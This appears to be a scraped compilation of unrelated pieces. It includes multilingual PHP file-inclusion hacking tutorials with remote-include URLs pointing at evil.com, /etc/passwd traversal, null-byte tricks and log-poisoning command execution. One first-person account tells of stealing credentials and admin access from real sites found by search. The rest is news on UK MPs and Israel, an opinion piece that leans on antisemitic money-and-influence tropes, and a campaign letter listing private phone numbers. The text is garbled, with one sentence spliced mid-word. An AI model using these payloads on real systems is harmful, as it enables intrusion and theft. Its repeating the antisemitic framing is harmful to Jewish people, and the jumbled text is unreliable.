• Vulnerabilidades Web

En este articulo se hablan sobre diferentes vulnerabilidades a nivel web, se habla sobre conceptos, codigo, ejemplos y como evitar este tipo de vulnerabilidades en nuestras aplicaciones sin perder dinamismo alguno. Los bugs tratados en este articulo son Cross Site Scripting, Remote File Inclusion y Local File Inclusion, en los diferentes temas se sigue la misma dinamica de mostrar ejemplos de codigo junto con una descripcion detallada del mismo.

Descarga ( 122 Kb. )

Blocarea se face folosind directiva Deny dupa cum urmeaza:
Click pentru a citi tutorialul complet-Blocheaza accesul la fisierele sistemului

É o caso da maior parte das aplicações web. Actualmente as falhas de segurança mais comuns são:

• RFI Inclusão remota de ficheiros
• LFI Inclusão local de ficheiros
• SQL INJECTION
• XSS
• E outras variantes...

Exemplos de códigos vulneráveis escritos em PHP e respectivos ataque. (RFI e LFI)

Código:

<?php

// php01.php

include($_GET['lang']);

echo "Seleccionou a linguagem {$_GET['lang']}";

?>

Ataque:

http://site-da-victima.pt/php01.php?lang=http://evil.com/xxx.php

Então você pensa, se eu substituir include($_GET['lang']); por include($_GET['lang'].'lang.php'); já não há problema... Esta muito enganado!!EHEHEH

Código:

<?php

// php01.php

include($_GET['lang'].'lang.php');

echo "Seleccionou a linguagem {$_GET['lang']}";

?>

Ataque:

http://site-da-victima.pt/php01.php?lang=http://evil.com/xxx.php%00

O caracter %00 corresponde ao em C, que determinava o fim de uma string. Então o %00 faz com que tudo que esteja depois seja ignorado. E assim a string .'lang.php' não será processada.

Se o %00 não funcionar pode tentar o caracter ?.

Então você pensa novamente. Se eu substituir include($_GET['lang'].'lang.php'); por include('./langs/'.$_GET['lang'].'lang.php'); já não há qualquer hipotese.

Tem razão, em relação a inclusão remota, mas o código continua vulnerável à inclusão local.

Código:

<?php

// php01.php

include('./langs/'.$_GET['lang'].'lang.php');

echo "Seleccionou a linguagem {$_GET['lang']}";

?>

Ataque:

http://site-da-victima.pt/php01.php?lang=../../../../../passwd%00

ou então

http://site-da-victima.pt/php01.php?lang=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fpasswd%00

Também é possível injectar código PHP em imagens, para posteriormente ser executado recorrendo à LFI.

There is a "Lesson Plan" a kind of tutorial and in the "Hints Menu" you can view the parameters, cookies, the Code and the solution.
It's a lot of fun and you learn more about web application security.

You can download the app from http://code.google.com/p/webgoat/.

It comes with the Java Runtime Environment and a configured Tomcat 5.5
server and should run on any platform.

If you are using Linux or OSX you must download http://webgoat.googlecode.com/svn/tags/webgoat-5.1/main/webgoat.sh to start webgoat.
Put the webgoat.sh in your unpacked webgoat directory and start it
with the terminal:

$ sh webgoat.sh start8080

On Windows it should run throw a double-click on webgoat8080.bat.

Browse to http://guest:guest@127.0.0.1:8080/WebGoat/attack with your
browser and start your first lesson.

happy hacking

Three members of Parliament were recognized for their activities advocating for Israel at a reception in the House of Commons last week.

At an all-party reception hosted by Israeli Ambassador Ron Prosor, Conservative Liam Fox, Labor's Louise Ellman and Liberal Democrat Lembit Opik were each presented with a silver kiddush cup in recognition of their "indefatigability."

As shadow defense secretary, Fox has visited Israel on numerous occasions. At the 2006 Conservative Party Conference, he said: "Even in dealing with Israel, we must remember that in the battle for the values that we stand for, for democracy against theocracy, for democratic liberal values against repression - Israel's enemies are our enemies and this is a battle in which we all stand together or we will all fall divided."

Ellman is a member of the Holocaust Educational Trust's council and vice-chair of Labor Friends of Israel. Last week, she posed a question to the parliamentary under-secretary of state for international development, Shahid Malik, about steps he has taken to ensure that aid allocated to Palestinians was spent on the purposes for which it was intended.

After Malik told her that "aid to the occupied Palestinian territories is subject to the highest possible level of scrutiny," Ellman pointed out that on December 29, a truck was found transporting 6.5 tons of potassium nitrate, which can be used to construct bombs, into Gaza, disguised in a bag labelled "EU sugar."

Prosor called Ellman "a tireless champion of democracy in the Middle East and a voice of reason, calmness and perspective."

Opik is also the chair of the All Party Parliamentary Friends of the Bahai Faith.

The ambassador thanked Opik for his support and his work on human rights and Holocaust education and with Bahais.

Prosor also discussed Britain's Universal Jurisdiction Legislature, which has been used to issue arrest warrants for Israelis on "war crimes" charges. He said the law was detrimental to relations between Israel and the UK and called for it to be amended.

British citizens can file private criminal complaints of war crimes against military personnel, even if the military personnel are citizens of other countries and the alleged crimes were not committed on British soil.

In 2005, Maj.-Gen. (res.) Doron Almog - former OC Southern Command - evaded arrest at Heathrow Airport in London after he was warned not to disembark from an El Al flight because British detectives were waiting to arrest him for allegedly ordering the demolition of Palestinian homes in Gaza in 2002.

In 2006, Gaza Division commander Brig.-Gen. Aviv Kochavi, who was scheduled to study at the Royal College of Defense Studies in London, was warned by an IDF judge that he could be arrested on arrival in Britain. Kochavi canceled his trip.

Former Shin Bet (Israel Security Agency) chief Avi Dichter also canceled a trip last year out of concern that a warrant might be issued for his arrest.

Also on Wednesday, James Arbuthnot, MP, chair of the Conservative Friends of Israel Parliamentary group, asked Prime Minister Gordon Brown whether if Israel enjoyed greater security, "the lives of Palestinians would be transformed beyond recognition."

"I agree entirely," Brown said. "It is important that we move forward by guaranteeing the security of Israel and then responding to the urgent needs of the Palestinian people."

Brown said he wanted to see more action dealing with the poverty in the two areas of the Palestinian Authority, and to safeguard the security of Israel. He said he would soon discuss these issues with Prime Minister Ehud Olmert.

Dear Friends and Visitors: I am Inviting you guys and girls to come!

The Official Grand Opening of LFI Wellness Sanctuary and our Fortune Foodcourt will be on 16th Febuary 2008, 11am - 1.30pm.
We're Located at Blk 89, Marine Parade Central.
Level 1 Fortune FoodCourt and Level 2 LFI Wellness Sanctuary.

Expect to meet our LFI ambassadors and our MediaCorp celebrities - Tay Ping Hui, Vincent Ng & Marcus Chin.
Please Drop me a call/sms/msg/email if you would like to drop by on that day, or if you would like to enquire further on our wellness sancuary/services, special promotions to be given away based on appointments only!

A story is told of a Londoner, a Jewish man who was riding on the London Underground reading an Arab newspaper. A friend of his, who happened to be riding in the same underground car, noticed this strange phenomenon. Very upset, he approached the newspaper reader.

"Moishe, have you lost your mind? Why are you reading an Arab newspaper?" Moishe replied, "I used to read the Jewish newspaper, but what did I find? Jews being persecuted, Israel being attacked, Jews disappearing through assimilation and intermarriage, Jews living in poverty. So I switched to the Arab newspaper. Now what do I find? Jews own all the banks, Jews control the media, Jews are all rich and powerful, Jews rule the world. The news is so much better!"

Truth must be said, Moishe, is telling the truth here. The Jewish press in Britain is panicking lately and they have good reason, too. While the British papers are filling their mouths with water hiding the real story behind the huge Labour donation sleaze, the UK Jewish press is overwhelmingly concerned with the unveiling saga. We have already learned about Lord ‘cash machine’ Levy who acted as ‘No 1 Labour fund raiser’. We have learned recently about David Abrahams who donated his money to the party by proxy. Both Levy and Abrahams were overwhelmingly active at the time Britain was taken into an illegal war by the Labour government. David Abrahams already admitted in an interview to the Jewish Chronicle that he donated money by proxy to “to quell conspiracy fears”.

Interestingly enough, the ‘Political Parties, Elections and Referendums Act 2000 ’ introduces some clear regulations concerning donation to political parties in Britain. According to the 2000 Act, donators have to report donations worth more than £1,000 from permitted donors (individuals on the UK electoral register, or UK-registered companies) and donations worth more than £200 from unidentified or impermissible donors. The 2000 act is there to protect Britain’s political world from being subject to any criminal or foreign interests. The act is there to protect Britain from conspiracy or anything that may even look like a conspiracy.

Levy and Abrahams were prominent activists in the ‘Labour Friends of Israel’ and ‘Jewish Labour’. They both operate as Israeli lobbyists. It is more than possible that their interests as openly rabid Zionists do not exactly match the British interests. I am not here to suggest that this is indeed the case. However, Abrahams’s confession to the JC is there to suggest that at least Abrahams himself thought that his donation to the Labour party could be interpreted as a conspiracy.

Yesterday, Peter Hain, a senior British Cabinet minister resigned. Once again following a row over political donations and guess what, once again it is Zionist donators who put money into his campaign by proxy.

Hain, who served as Work and Pensions Secretary said he was leaving to clear his name after electoral authorities referred questions to the police about the funding of his unsuccessful campaign to become deputy Labor Party leader. Clearly, the British press avoids questioning the identity of the donators, and more crucially there is the disturbing question: what was it that they tried to buy? But as Moishe confesses in the joke above, Jewish newspapers are there to spread the depressive news.

Last week Jewish Chronicle’s report on the Hain affair is indeed very revealing yet concerning.
“International diamond broker Willie Nagel, 83 — one of two Jewish benefactors to Mr Hain’s campaign through the Progressive Policies Forum — told the JC he had donated and loaned money to PPF and had “no objection that this money [had been] used to support Peter Hain’s campaign”.

Seemingly, Mr. Nagel changes league quite easily. As much as was happy to donate to Labour candidates in power, he was delighted to donate to the Tories at the time when they ran this country.

Here is the JC report:

“Mr Nagel, a member of St John’s Wood Synagogue, was also known to be close to the Conservatives during the premierships of Baroness Thatcher and John Major. He reportedly donated to Mr Major’s Huntingdon constituency, giving rise to reports in the media that he had attempted to interest the then-prime minister in Israeli-made unmanned aircraft at a time when the UK maintained an arms embargo on Israel.”

Clearly, Mr Nagel operates here as a foreign lobbyist for Israeli interests and even military interests. As much as Peter Hain was happy to receive Mr Nagel’s money, it does raise big questions as to whether Mr. Nagel was a ‘permissible’ donator. Though, he is a UK citizen, he clearly represent some foreign interests.

The JC continues. Mr Nagel “has been a vice-chairman of Israel Bonds UK, and played a major role in the Balfour Diamond Jubilee Trust and the British Overseas Trade Group for Israel. He is also a life-long supporter of both the Labour and Conservative Friends of Israel and appears regularly in the JC “Guest List” pages alongside leading Israeli and communal figures.”

Clearly Mr Nagel was there to buy Israeli interests and it is NO coincidence that Peter Hain ‘forgot’ to report of his voluntary contribution. I ask myself whether there are many donators in this country who openly send money to the two rival parties. I guess the answer is no. There are not many, there are just very few.

However, Mr Hain’s other benefactor is another prominent Zionist named Isaac Kaye. Mr Kaye is a South African-born multi-millionaire who was known for his support of the South African Apartheid regime.

Mr Kaye, 78 year old a man with dubious past “is the former chairman of Norton Healthcare, which was investigated by police looking into an alleged £400 million price-rigging of pharmaceuticals sold to the NHS.” Mr Kaye is obviously a rabid Zionist and a major Israeli Lobbyist. Again the JC report that Mr Kaye “has backed the Community Security Trust, UJIA and other Jewish and pro-Israel organisations. He is on the board of Bicom, the Britain-Israel Communications and Research Centre, and is a governor and major benefactor of the Hebrew University, where he has endowed the Kaye Research Awards.”

Interestingly enough, the Tories here do not do much to expose the identity of the Labour proxy donators. The reason is simple, they are backed by the very same people. We have read about Mr Nagel swinging between the two parties. Recently Parliament's sleaze watchdog has launched an inquiry into complaints made against shadow chancellor George Osborne. Mr Osborne allegedly received money from some of the wealthiest people in Britain, including banking heiress Lady Serena Rothschild, believed to have donated £190,000 to Mr Osborne.

Moishe is correct, the JC report is very concerning. The truth of Israeli lobbying in Britain is totally revealed in the Jewish Chronicle paper, God bless them. Interestingly enough, the British press wouldn’t touch the crux of the matter yet.

From Moishe’s point of view, the Guardian and the Independent are not a major concern for the time being. This might be the biggest asset of Britain and its tolerant culture. However, bearing in mind the genocide in Iraq, Britain has been led into its most devastating colonial phase ever by the Labour party. At a certain stage the question will be raised and it won’t be too long before the names Levy, Abrahams, Kaye, Nagel and a few others to pop up. This is very depressing and may even be very worrying as far as Moishe is concerned. I understand Moishe’s concerns and even feel for him.

However, since we have launched this article with Moishe’s joke it would be rather appropriate to end it with just another very short one,

A Jewish Telegram:
‘Begin worrying, details to follow.’

WILL NOBODY BRING CHRISTMAS CHEER TO BESIEGED AND STARVING GAZA?

Group urges Standards Committee to stamp out Israeli influence that paralyses heart of British government

As the twenty-one month long siege of Gaza becomes a death sentence for yet more civilians, a group in the UK with experience of the Occupied Territories is urging the Committee on Standards in Public Life to examine whether there is undue Israeli influence at the heart of British government.

The blockade stops vital medical supplies going in and prevents chronically sick patients (including children) transferring to proper hospital treatment outside Gaza. Israel’s deep penetration of our political system, says the group, is preventing Britain from taking a principled stand on Middle East matters, including the long catalogue of grotesque violations of Palestinian human rights, of which the Gaza siege is only the latest example. Conservative Friends of Israel, for example, claim the support of 80 percent of Tory MPs.

Signatories to the letter include Mona Baker, Karl Sabbagh, Derek Summerfield and Felicity Arbuthnot.

Spokesman for the group is David Halpin, a trauma surgeon, who has spent all of the last five years of his retirement standing with the Palestinians for Justice. He has seen the destruction of lives, limbs, livings and hope at first hand. He advised the Hamas government how they should investigate the use of illegal weapons by Israel. In March, he lead a team of seven UK doctors into Gaza. The Dove and Dolphin Medical Centre was opened then. This is named after the symbolic voyage he led five years ago from which the charity was named... www.doveanddolphin.co.uk

He says: "It is insufficient that humans should weep beneath the crucifixion of the Palestine people in 2007 AD. They must halt it forthwith."

Businessman Stuart Littlewood, who was in Gaza last month, remarked: "When you urge the British government to act for justice you are blocked at every turn by Friends of Israel in high places. No-one, it seems, is prepared to break the siege and land humanitarian supplies on Gaza's beach. What happened to our Christmas spirit?"

Felicity Arbuthnot campaigned for many years in Iraq. She says: "The horrors inflicted on Gaza and Iraq and threatened elsewhere in the Middle East are encapsulated for me by a young doctor. She had the skills but was denied the facilities and medications so she watched helplessly as her young patients died. 'There is a hole where my heart should be,' she said. In the name of our common humanity, as Eid, the Jewish Festival of Light and Christmas are celebrated, ENOUGH!"

The group invites readers to join them in pressing the Standards Committee to uphold the seven Principles of Public Life and banish lobby groups acting on behalf of foreign military regimes. Write to:

Mr Peter Ramsden
Secretary to the Committee
Committee on Standards in Public Life
35 Great Smith Street
London SW1P 3BQ
email: public@standards.x.gsi.gov.uk

-ends-
More information from....
David Halpin, 01364 661115
Stuart Littlewood, 01760 755349
Felicity Arbuthnot, 0208 985 0058

Castle Acre
Norfolk

19 December 2007

public@standards.x.gsi.gov.uk

Mr Charles Ramsden
Secretary to the Committee
Committee on Standards in Public Life
35 Great Smith Street
London SW1P 3BQ

Dear Mr Ramsden,

How the Israel Lobby undermines the Principles of Standards in Public Life – a Matter for Investigation

Those signing this letter know the Occupied Territories and in particular Gaza, and are deeply concerned about the appalling conditions forced on the civilian population by the Israeli blockade and sanctions imposed by Britain and the EU.

Devastating blockade

This Christmas innocent Gazans are starving. Critically ill cancer and renal failure patients die an agonising death, unable to receive treatment because Israel blocks vital drugs and other medical supplies, including dialysis machine spares, and prevents the sick crossing the border for proper hospital care. New-born babies and those just months old are dying too, denied treatment. The United Nations Declaration of the Right of the Child lies buried under the sands of Gaza.

Israel has even imposed a fishing ban on the 3000 licensed fishermen, robbing them of their livelihood and the population of a proper diet. Boats ignoring the ban are fired on. Are those not Palestinian territorial waters? Have Palestinians no rights under the UN Law of the Sea Conventions?

The Gaza siege is the latest in a very long catalogue of Israeli violations of Palestinian rights. It has been allowed to develop into a full-blown humanitarian crisis and Britain, to its shame, has a hand in it. Furthermore it is a racist outrage that Christians and Muslims are together made to suffer so horribly at the hands of the Israeli state.

A letter was delivered through Henry Bellingham MP to the Foreign Office minister responsible for the Middle East, Kim Howells, suggesting (as many others have done before, including charities such as War on Want) that Britain consider suspending the EU-Israel Association Agreement. The rules provide for this if Israel’s conduct towards its neighbours falls short of what is required under the UN Charter and other obligations.

On 11 October Mr Howells replied: “We consider that the Association Agreement is a key tool for the EU to both enhance co-operation with Israel but also to raise any concerns. We do not support suspension of that Agreement, which would limit how we could put our viewpoint across to the Israeli government.”

When the EU demanded an end to the emergency in Gaza and also the military occupation of the West Bank, Israel responded with an even tighter lockdown and another letter was sent to Mr Howells. He responded on 30 November saying: “The Government does not support calls for the suspension of the EU/Israel Association Agreement. The UK…has strong relationships with Israel on a number of fronts… We do not consider it would be in the best interests of the UK, or the European Union, to end this relationship.”

Mr Howells is a former chairman of Labour Friends of Israel. His shadow is a member of Conservative Friends of Israel.

The minister has subsequently been asked to explain what "viewpoint" Her Majesty’s Government has put to the Israeli government regarding the medieval-style siege of Gaza and the collective punishment of already impoverished civilians in flagrant breach of the UN Charter and every conceivable code of conduct.

What action have he and his Department taken to alleviate the suffering in this former British mandate? What is the status of the coastal waters off Gaza? How can Israel maintain a sea blockade lawfully and deny Gazan fishermen their livelihood?

How does continuing the Association Agreement in these cruel circumstances "enhance co-operation", and what "concerns" have been raised with the Israeli government?

No answers to these questions have yet been received.

British MPs eating out of the Israeli government’s hand

In the meantime your Committee is aware how the lobby group, Friends of Israel, has embedded itself in the British political establishment and at the very heart of government. Its stated purpose is to promote Israel's interests in our Parliament and sway British policy.

MPs are surely not at liberty to act in the interest of a foreign military power at the expense of our own national interests, or to let foreign influence cloud their judgement. Such conduct is at odds with the second of the Seven Principles of Public Life, namely Integrity – “Holders of public office should not place themselves under any financial or other obligation to outside individuals or organisations that might seek to influence them in the performance of their official duties.”

The Friends of Israel organisation goes to great lengths to influence those in power. Indeed a good many, it seems, reach positions of power with FoI help. The political director of Conservative Friends of Israel claims that with over 2,000 members and registered supporters alongside 80 percent of the Conservative MPs, CFI has become the largest affiliated group in the party.

Its website states that the CFI "strives to support the Conservative Party at all available opportunities. In the run up to the 2005 General Election… CFI supported candidates up and down the country. As candidates are now being continuously selected for target seats, CFI has developed a special programme of weekly briefings, events with speakers and a chance to participate in delegations to Israel. CFI encourages all members to help campaign for parliamentary candidates and also for local council, London and European elections."

It also has a ‘Fast Track’ group for Conservative parliamentary candidates fighting target marginal seats at the next election. The political director himself is seeking election to Parliament. If successful where will his loyalty lie?

Senior Conservatives try to justify these activities by insisting that Israel is "a force for good in the world" and "in the battle for the values that we stand for, for democracy against theocracy, for democratic liberal values against repression - Israel's enemies are our enemies and this is a battle in which we all stand together".

Such claims do not bear examination. Israel is no western-style democracy. It is an ethnocracy with racist policies and an apartheid agenda. It is a cruel oppressor, stands in breach of numerous UN resolutions, ignores International Court of Justice rulings and continues an illegal occupation, abusing its neighbours and stealing their lands and resources. It cares little for world opinion. How could anyone or. She had the skills but was denied the facilities and medications so she watched helplessly as her young patients died.f fair mind and knowing the situation on the ground possibly support such a regime in the name of the British people, unless unduly under its influence?

Friends of Israel campaign loudly against Palestinian ‘terrorism’ without mentioning that since the start of the second Intifada in September 2000 Israelis have been slaughtering Palestinians at the rate of 4 to 1, and when it comes to children it is nearer 10 to 1 (Israeli B’Tselem figures). They never mention the ‘Matrix of Control’ and the perverse administrative procedures imposed by the Israelis in order to restrict travel, strangle the economy, bulldoze homes, confiscate lands and press ahead with their programme of ethnic displacement.

Friends of Israel repeatedly campaign for the release of a handful of Israeli soldiers like Gilad Shalit, corporal tank gunner, but ignore the 9,000+ Palestinian civilians abducted from their homes and incarcerated, often without trial, including some 300 women and 150 children. Many have been tortured, like Luwaii Ashqar whose lower lumbar spine was probably broken during 4 days of vicious, non-stop torment – see http://www.haaretz.com:80/hasen/spages/871239.htm and prepare to be sickened.

What is the basis for Britain’s decision to outlaw elected leaders (Hamas) who rightly refuse the illegal demands of an armed occupier (Israel)? And why has there been no outcry in Britain against the unlawful and inhuman siege of Gaza?

Courted, cosseted and lied to by the Israeli state, Friends of Israel present a distorted picture to their Parliamentary colleagues and the British public. Such people cannot be relied on to make balanced policy decisions concerning the Middle East. When speaking on such matters they should at least be required to declare their interest.

It is especially disconcerting to discover that at least two members of your Committee, which is pledged to uphold the Principles of Public Life, are Friends of Israel - namely Baroness Shephard, president of Conservative Friends of Israel and Alun Michael MP, a member of Labour Friends of Israel. Your website suggests that Baroness Shephard relinquished her pro-Israel position in 2005 but the CFI website contradicts this.

‘Friendship’ misplaced

The danger of inappropriate 'friendships' with foreign regimes became even more evident last week when Tzipi Livni, Israel's foreign minister, was reported to have twice asked David Miliband, our Foreign Secretary, to scrap the law that authorises magistrates to issue arrest warrants for suspected war criminals who set foot in the UK. Avi Dichter, a former director of the Shin Bet spy service and involved in the Shehadeh assassination in 2002, in which 14 Palestianian civilians (including children) were killed by an Israeli air strike, had to cancel a trip to London for fear of being arrested.

Doron Almog, an Israeli ex-general also involved in the Shehadeh affair, narrowly avoided arrest when he landed at Heathrow in 2005. Now Israel wishes the UK to change its laws to protect alleged war criminals. How can we be sure this will not happen in the name of “enhanced co-operation”, as Mr Howells puts it.

Given that Israel’s deep penetration of our political system apparently prevents Britain from taking a principled stand on Middle East matters, including the violations of Palestinian human rights, we invite your Committee – minus those with an interest – to uphold the Principles of Public Life and consider the activities of the Friends of Israel as a matter for urgent investigation.

For truth and justice,

(Signatories)

Mona Baker, Professor of Translation Studies, BA, MA, DSc

Sally FitzHarris, MA (Oxon)

Karl Sabbagh, writer

Sara T A Wood, MA (Oxon)

Derek Summerfield, Hon Senior Lecturer, Institute of Psychiatry, King's College and Teaching Associate, Refugee Studies Centre, University of Oxford

David Halpin, MB, BSc, FRCS,

Stuart Littlewood, BA, MInstM

Martin Birnstingl, MS FRCS, previously senior surgeon at St Bartholomew's Hospital, London

Felicity Arbuthnot

Rich Wiles, Artist

Dr.C.J.Burns-Cox, MD, FRCP

Dr Nur Masalha, Reader in Religion and Politics and Editor of Holy Land Studies: A Multidisciplinary Journal

David Seddon, MA PhD

Robert Shearer, MB BS FRCS, Consultant Urological Surgeon (retd)

Medical Director, Royal Marsden Hospital, London 1994-2000.

James Goddard, MBE and Tricia Goddard

Sue Fanous, BSc, MA

Colin Imber, formerly Reader in Turkish Studies, University of Manchester

Mary Bedforth

(Ed. Note. Addresses in the original have been deleted for obvious reasons.)

Essential information for the Committee….

PCHR Weekly Report: Israeli Human Rights Violations
http://www.pchrgaza.org/files/W_report/English/2007/13-12-2007.htm

Walt & Mearsheimer: The Israel Lobby
http://www.lrb.co.uk/v28/n06/mear01_.html

John Pilger
http://www.informationclearinghouse.info/article18904.htm

USA’s Israel Lobby http://www.redress.cc:80/global/pjballes20070917

Jeff Halper: Israel’s Strategy for Permanent Occupation
http://www.counterpunch.org/halper11272007.html

Privatising Zionism
http://www.zmag.org:80/content/showarticle.cfm?SectionID=107&ItemID=14510

Uri Avnery: Talk with Hamas Now
http://www.redress.cc/palestine/uavnery20060129

Facts about the Founding Fathers of Israel
http://www.redress.cc/palestine/skabbani20040424

40 Years of House Demolitions
http://www.icahd.org/eng/news.asp?menu=5&submenu=1&item=488

Gaza: A Call for Urgent Action
http://www.icahd.org/eng/news.asp?menu=5&submenu=1&item=483

Not Only Territory but Viability
http://www.icahd.org/eng/news.asp?menu=5&submenu=1&item=480

Matrix of Control
http://www.merip.org/mer/mer216/216_halper.html

Torment and Torture http://www.redress.cc/palestine/dhalpin20071211

Finally, a quiz to test the knowledge of any Friend of Israel on the Refugee issue
http://www.personal.leeds.ac.uk:80/~eenajma/PalQuiz/quiz1/quizmaker.html

Lest we forget…..

The Seven Principles of Public Life
The Committee has set out ‘Seven Principles of Public Life’ which it believes should apply to all in the public service. These are:

Selflessness
Holders of public office should act solely in terms of the public interest. They should not do so in order to gain financial or other benefits for themselves, their family or their friends.

Integrity
Holders of public office should not place themselves under any financial or other obligation to outside individuals or organisations that might seek to influence them in the performance of their official duties.

Objectivity
In carrying out public business, including making public appointments, awarding contracts, or recommending individuals for rewards and benefits, holders of public office should make choices on merit.

Accountability
Holders of public office are accountable for their decisions and actions to the public and must submit themselves to whatever scrutiny is appropriate to their office.

Openness
Holders of public office should be as open as possible about all the decisions and actions that they take. They should give reasons for their decisions and restrict information only when the wider public interest clearly demands.

Honesty
Holders of public office have a duty to declare any private interests relating to their public duties and to take steps to resolve any conflicts arising in a way that protects the public interest.

Leadership
Holders of public office should promote and support these principles by leadership and example.

Ok whats the deal with null bytes?

A lot of people think that this method below, to include a file which has a fix extension (.php), is a bullet prof one, but that's not true.

If you call the script with a null byte in the URL it's possible to include any local or remote site!

http://example.com/?site=../../../../etc/passwd%00

Resümee
Gewöhnungsbedürftig war die Art des Vortrages ohne sichtbare Person. Dem Wunsch, nach einem Bild zu der Stimme, konnte über die Homepage nachgekommen werden.
Bei zukünftigen Präsentationen über den LiOn vor unbekanntem Publikum, würde ein Bild der/des Referent/in zu Beginn der Präsentation sicherlich nicht schaden.Nach 5 bis 10 Minuten Vortrag sollte der/die anwesende Moderator/in in Erscheinung treten. Es ist wichtig dem/der Referenten/in Feedback über die Stimmung zu geben. Dem Publikum wird Abwechslung geboten und durch eine aktive Aufforderung des Moderators, z.B. Fragen abklären, diskutieren etc., wird das Publikum aktiv in das Referat eingebunden.

Zwei wesentliche Aspekte konnte dieses Impulsreferat abdecken.
Fachinformationen wurden ohne physische Präsenz der kompetenten Person vorgetragen. Für diesen Input wäre eine Reise aus der Steiermark nicht gerechtfertigt. Über LiOn war es möglich.
Die technische Möglichkeit konnte anhand dieses praktischen Beispiels demonstriert werden. Es handelte sich dabei um kein inszeniertes Beispiel.

Herzlichen Dank an Martina Weinzettl!

Why is it a security risk? Let's look at this example:

With register_globals enabled (register_globals = On), this page can be requested with ?login=1 in the query string to bypass the intended access control.
Of course, this particular vulnerability is the fault of the developer, not register_globals, but this indicates the increased risk posed by the directive. Without it, ordinary global variables (such as $login in the example) are not affected by data submitted by the client.

Another example that illustrates how register_globals can be problematic is the following use of include with a dynamic path:

With register_globals enabled, this page can be requested with ?path=http://evil.example.org/evilscript in the query string in order to equate this example to the following:

include 'http://evil.example.org/evilscript';

If allow_url_fopen is enabled (which is by default), this will include the output of http://evil.example.org/evilscript just as if it were a local file. This is a major security vulnerability called remote file inclusion (RFI), and it's one that has been discovered in many popular open source applications.

It's also possible that someone reads local files with the example above (LFI = local file inclusion). A requested page with ?page=../../../../etc/passwd in the query string and it will show you on Unix-based systems the password file.

I think register_globals must be disabled and every programmer must take care of the global spacing from php.
The best way is to initialize all variables and to develop with error_reporting set to E_ALL, so that the use of an uninitialized variable
won't be overlooked during development.

So i first looked at the google dork. Seems ok, but i preferred to change it a little bit to:
allinurl:force-download.php.file=

And i started to play around with it.
Started my firefox turned on hackbar view on, took the first result in google (i never do this, but this time i was high a bit) and started to test the site.
I saw that i can include the index.php file like this

http://vulnerabile.site/force-download.php?file=index.php

And i could download the file. Wow! This is nice. What does this actually mean ?
That the file is not included in the script, and the headers were similar to this:

Content-Disposition: attachment; filename=index.php

Hmm, i cannot use log poisoning and including... damn.
I'm looking around though the files and i'm trying to see all the saved passwords and information that could help me.
Interesting files like: config.php, config.inc.php, db.php.
I can see mysql passwords, smtp servers, everything.
I'm getting bored with this site and i go looking for another one.

I finally find an interesting site. I see that the /admin directory exists and automatically redirects me to login.php.
I'm thinking, are they stupid enough to put the password in plain text ? A few seconds and... yes they are.
Hello, i have admin over the whole site. Cool!

No defacement. I don't like full defacements. Only a few scary clowns pictures added.

Mai intai, sa vedem acest mic cod php:

Acesta este un cod care nu ar trebui folosit niciodata, vulnerabil la LFI, pentru ca variabila $page nu este santinizata.

Ok, acum sa profitam de aceasta vulnerabilitate, folosind urmatorul cod:

Daca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd si codul de mai sus ne arata aceste parole si usernameurile. Acum tot ce mai ai de facut este sa decodezi parola.
O parola criptata, ar trebui sa arate cam asa:

In acest exemplu, parola este x, alt exemplu de parola fiind:

Alte "locuri" unde puteti gasi parolele in afara de /etc/passwd ar cam fi:

In caz ca Browserul va arata la sfarsitul includerii un .php (si automat. /etc/passwd.php nu va mai exista), adaugati la sf includerii %00, serverul va omite tot ce scrie dupa %00.
Exemplu de cod:

Acum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le.
Cateva adrese de loguri:

Ok, acum sa aruncam o privire asupra logului in care se salveaza paginile care nu exista si urmatorul cod: <? passthru(\$_GET[cmd]) ?>. Daca scriem in browser:

O sa ne arate evident o pagina in care scrie ca acest cod nu exista pe server, deoarece browserul encodeaza automat URL'ul si pagina pe care noi am accesat-o, browserul o traduce in:

Deci va trebui sa facem altceva... Putem utiliza urmatorul script perl:

Copy/Paste la chestia asta si salveaz-o ca ex.pl, dar nu uita sa modifici in exploit urmatoarele lucruri:
1) modifica numele siteului
2) modifica numele logului si calea catre el
3) schimba index.php= cu ce doresti tu

Rulati scriptul si el va va intreba ce comenzi sa rulati !!! Va descurcati de aici incolo !!!

Linkuri utile:

Acesta este un mic tutorial video, incercati sa-l vizionati ca este foarte bun.

Proof of Concept:
[img]
http://img355.imageshack.us/my.php?image=sitewe2.jpg
[/img]

Traducerea si adaptarea+modificari: vladiii